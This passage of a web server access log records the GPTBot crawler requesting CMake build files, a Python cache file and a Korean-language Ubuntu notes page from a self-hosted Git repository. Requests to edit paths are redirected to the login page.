"https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15176] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15176] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14464] [Gzip 8.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:16:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10304] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21645] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16829] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10237] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21645] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10235] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21644] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10816] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10218] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10196] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 